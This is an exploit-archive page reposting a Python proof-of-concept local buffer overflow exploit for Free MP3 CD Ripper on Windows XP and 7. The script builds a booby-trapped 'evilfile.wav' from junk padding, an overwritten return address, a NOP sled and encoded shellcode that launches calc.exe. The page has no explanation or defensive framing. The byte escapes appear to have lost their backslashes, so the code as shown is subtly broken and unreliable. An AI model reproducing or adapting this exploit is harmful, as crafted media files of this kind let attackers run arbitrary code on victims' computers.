Home / exploits Free MP3 CD Ripper Buffer Overflow
Posted on 24 March 2015
#!/usr/bin/python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Free MP3 CD Ripper All versions Local Buffer Overflow #[+] Date: 20-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R from struct import pack file="evilfile.wav" junk="x41"*4112 eip = pack('<I',0x7C9D30D7) nops = "x90" * 3 #Calc.exe Shellcode #POC:http://youtu.be/_uvHKonqO2g shellcode = ("xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1x1ex58x31x78" "x18x83xe8xfcx03x78x68xf4x85x30x78xbcx65xc9x78xb6x23xf5xf3" "xb4xaex7dx02xaax3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6bxf0x27xddx48xfd" "x22x38x1bxa2xe8xc3xf7x3bx7axcfx4cx4fx23xd3x53xa4x57xf7xd8" "x3bx83x8ex83x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98xf5" "xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61xb6x0ex2fx85x19x87" "xb7x78x2fx59x90x7bxd7x05x7fxe8x7bxca") writeFile = open (file, "w") writeFile.write(junk+eip+nops+shellcode) writeFile.close()
